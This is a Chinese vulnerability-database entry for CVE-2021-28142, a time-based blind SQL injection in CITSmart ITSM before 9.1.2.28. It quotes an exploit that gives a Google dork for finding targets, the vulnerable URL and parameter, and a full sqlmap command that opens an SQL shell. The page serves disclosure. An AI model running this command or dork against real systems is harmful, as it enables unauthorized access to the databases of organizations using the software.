CITSmart 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 2405929 漏洞类型 其他
发布时间 2021-04-15 更新时间 2021-04-15
CVE编号 CVE-2021-28142 CNNVD-ID CNNVD-202104-380
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2021040083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202104-380
|漏洞详情
CITSmart是葡萄牙CITSmart公司的一个应用软件。提供设计组织的所有流程。 CITSmart 9.1.2.28之前版本存在安全漏洞,该漏洞源于错误地处理了“filtro de autocomplete.”。
|漏洞EXP
# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
# Google Dork: "citsmart.local"
# Date: 11/03/2021
# Exploit Author: skysbsb
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
# Version: < 9.1.2.28
# CVE : CVE-2021-28142

To exploit this flaw it is necessary to be authenticated.

URL vulnerable:
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
Param vulnerable: query

Sqlmap usage:  sqlmap -u "
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell

Affected versions: < 9.1.2.28
Fixed versions: >= 9.1.2.28

Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)

|参考资料

来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2021-28142